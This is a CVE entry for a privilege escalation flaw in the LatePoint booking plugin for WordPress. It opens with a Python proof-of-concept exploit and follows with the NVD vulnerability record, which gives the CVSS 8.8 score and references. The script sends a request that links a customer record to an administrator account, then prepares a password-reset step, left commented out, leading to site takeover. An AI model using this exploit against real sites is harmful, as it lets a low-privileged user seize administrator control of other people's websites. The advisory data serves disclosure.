CVE-2026-6741

# PoC for CVE-2026-6741: LatePoint Privilege Escalation # This script demonstrates the logic of linking a customer to an admin account. import requests def exploit(target_url, agent_cookie, admin_id, customer_id): session = requests.Session() session.headers.update({ 'Cookie': agent_cookie, 'Content-Type': 'application/x-www-form-urlencoded' }) # Step 1: Link customer to admin via vulnerable endpoint # The vulnerability is in the execute() method of connect-customer-to-wp-user ability payload = { 'action': 'latepoint_route_call', 'route_name': 'connect_customer_to_wp_user', 'params': { 'customer_id': customer_id, 'wp_user_id': admin_id }, 'return_format': 'json' } link_url = f"{target_url}/wp-admin/admin-ajax.php" response = session.post(link_url, data=payload) if response.status_code == 200: print("[+] Successfully linked customer to admin account.") print(f"Response: {response.text}") # Step 2: Trigger password reset # The specific endpoint for password reset may vary based on plugin configuration reset_payload = { 'user_email': '[email protected]', # Email associated with the customer/admin 'action': 'reset_password' } # reset_url = f"{target_url}/latepoint/customer/forgot_password" # reset_resp = session.post(reset_url, data=reset_payload) # print("[+] Password reset triggered. Check email for reset link.") else: print("[-] Exploit failed.") # Usage # exploit("http://localhost", "wordpress_logged_in_...", "1", "5")

{"cve": {"id": "CVE-2026-6741", "sourceIdentifier": "[email protected]", "published": "2026-04-27T20:16:28.580", "lastModified": "2026-04-27T20:21:52.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 5.4.1. This is due to a missing authorization check in the execute() method of the connect-customer-to-wp-user ability, which only requires the customer__edit capability granted to the latepoint_agent role by default, without verifying whether the target WordPress user ID belongs to a privileged account. This makes it possible for authenticated attackers with the latepoint_agent role to link any LatePoint customer record to an administrator's WordPress account and subsequently reset the administrator's password via the normal customer password-reset flow, resulting in full site takeover."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/abilities/customers/connect-customer-to-wp-user.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/helpers/roles_helper.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/models/customer_model.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3514330/latepoint", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/latepoint/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/71e99412-031e-4f4a-9126-dd3a37975246?source=cve", "source": "[email protected]"}]}}